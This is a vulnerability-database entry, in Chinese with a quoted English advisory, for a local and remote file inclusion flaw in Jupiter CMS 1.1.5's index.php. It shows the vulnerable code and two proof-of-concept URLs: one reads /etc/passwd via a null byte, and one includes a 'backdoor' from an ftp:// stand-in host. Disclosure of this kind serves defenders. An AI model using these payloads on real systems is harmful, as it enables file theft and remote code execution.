Jupiter CMS 'index.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112223 漏洞类型 代码注入
发布时间 2007-02-14 更新时间 2007-02-20
CVE编号 CVE-2007-0986 CNNVD-ID CNNVD-200702-336
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/3309
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-336
|漏洞详情
JupiterCMS1.1.5版本的index.php中存在PHP远程文件包含漏洞,当PHP5.0.0版本或其后期版本在运行时,远程攻击者可以借助n参数中的一个ftpURL,执行任意PHP代码。
|漏洞EXP
Title:          Jupiter CMS 1.1.5 Multiple Vulnerabilities
Advisory ID:    12070214
Risk level:     High
Author:         DarkFig <gmdarkfig@gmail.com>
URL:            http://www.acid-root.new.fr/advisories/12070214.txt

Risk level: High
Summary:    Local/Remote File Inclusion
Conditions: LFI: magic_quotes_gpc = Off
            RFI: PHP >= 5.0.0, allow_url_fopen = On

The script "index.php" contains the following code:

if(isset($n))
{
  if(file_exists("$n.php"))
  {
    if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error");
    else include("$n.php");
  }
  elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error");
}

The "n" parameter isn't properly filtered, this can lead to file inclusion.
Local file inclusion will work if magic_quotes_gpc=Off, the null byte char \x00
is required. Remote file inclusion will work if the server is running on PHP >= 5.
In this version, the file_exists() function can be used with some URL wrappers,
you can use ftp:// for example. Simple poc:

LFI: http://<host><path>/index.php?n=/etc/passwd%00
RFI: http://<host><path>/index.php?n=ftp://user:password@example.com/backdoor

# milw0rm.com [2007-02-14]
|参考资料

来源:XF
名称:jupitercm-index-n-file-include(32519)
链接:http://xforce.iss.net/xforce/xfdb/32519
来源:BID
名称:22560
链接:http://www.securityfocus.com/bid/22560
来源:BUGTRAQ
名称:20070214Re:JupiterCMS1.1.5MultipleVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/460100/100/0/threaded
来源:BUGTRAQ
名称:20070214JupiterCMS1.1.5MultipleVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/460076/100/0/threaded
来源:MILW0RM
名称:3309
链接:http://www.milw0rm.com/exploits/3309
来源:MISC
链接:http://www.acid-root.new.fr/advisories/12070214.txt
来源:OSVDB
名称:33730
链接:http://osvdb.org/33730
来源:MILW0RM
名称:3309
链接:http://milw0rm.com/exploits/3309
来源:MISC
链接:http://mgsdl.free.fr/advisories/12070214.txt